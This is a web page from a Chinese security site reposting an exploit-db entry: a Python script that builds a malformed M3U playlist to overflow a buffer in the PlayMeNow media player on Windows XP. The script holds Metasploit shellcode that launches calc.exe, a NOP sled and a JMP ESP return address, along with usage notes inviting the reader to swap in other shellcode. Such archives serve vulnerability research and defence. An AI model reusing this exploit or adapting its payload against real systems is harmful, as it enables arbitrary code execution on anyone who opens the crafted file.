首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PlayMeNow Malformed M3U Playlist WinXP Universal BOF
来源:http://www.exploit-db.com 作者:loneferret 发布时间:2009-12-21  

#!/usr/bin/python

# Vulnerability:         PlayMeNow Malformed M3U Playlist WinXP Universal BoF
# Product:   PlayMeNow - media player.
# Versions affected:      Tested with 7.3 and 7.4
# Tested on:               Windows XP Pro SP2/3 & Home SP3
# Author:                  loneferret
# Original Author:     Gr33nG0bL1n
# Reference:   http://www.exploit-db.com/exploits/10556
# Date: 19/12/2009
# Usage: Just choose your shellcode and open the created file(PlayMeNow_expl.m3u) with PlayMeNow.

# The offset is 1040, but the return address used brings us into it. So the shellcode is part of our
# offset buffer. Also, yes the return address does contain \x00. If you want to put in a bigger payload
# play around with the first & second set of As and those nops.

buffer = "\x41" * 465
buffer += "\x90" * 110

#win32_exec - 
#EXITFUNC=thread
#CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com */
buffer +=("\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4"
"\x5b\x35\x61\x83\xeb\xfc\xe2\xf4\x38\xb3\x71\x61\xc4\x5b\xbe\x24"
"\xf8\xd0\x49\x64\xbc\x5a\xda\xea\x8b\x43\xbe\x3e\xe4\x5a\xde\x28"
"\x4f\x6f\xbe\x60\x2a\x6a\xf5\xf8\x68\xdf\xf5\x15\xc3\x9a\xff\x6c"
"\xc5\x99\xde\x95\xff\x0f\x11\x65\xb1\xbe\xbe\x3e\xe0\x5a\xde\x07"
"\x4f\x57\x7e\xea\x9b\x47\x34\x8a\x4f\x47\xbe\x60\x2f\xd2\x69\x45"
"\xc0\x98\x04\xa1\xa0\xd0\x75\x51\x41\x9b\x4d\x6d\x4f\x1b\x39\xea"
"\xb4\x47\x98\xea\xac\x53\xde\x68\x4f\xdb\x85\x61\xc4\x5b\xbe\x09"
"\xf8\x04\x04\x97\xa4\x0d\xbc\x99\x47\x9b\x4e\x31\xac\xb4\xfb\x81"
"\xa4\x33\xad\x9f\x4e\x55\x62\x9e\x23\x38\x54\x0d\xa7\x75\x50\x19"
"\xa1\x5b\x35\x61")

buffer += "\x41" * 301  # end of our 1040 byte
buffer += "\x8c\x92\x5b\x00"  # 0x005B928C JMP ESP @ autorun.exe
buffer += "\xCC" * 2800  # junk

file=open('playmenow.m3u','w')
file.write(buffer)    # write file
file.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP 5.2.12/5.3.1 symlink() ope
·Win32 XP SP3 ShellExecuteA she
·PlayMeNow Malformed M3U Playli
·Linux - setreuid (0,0) & execv
·Mozilla Firefox Location Bar S
·TFTP SERVER Buffer Overflow re
·3Com OfficeConnect ADSL Wirele
·Cisco ASA <= 8.x VPN SSL modul
·Simple PHP Blog <= 0.5.1 Local
·VideoCache 1.9.2 vccleaner roo
·PlayMeNow Malformed M3U Playli
·Google Picasa 3.5 Local DoS Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved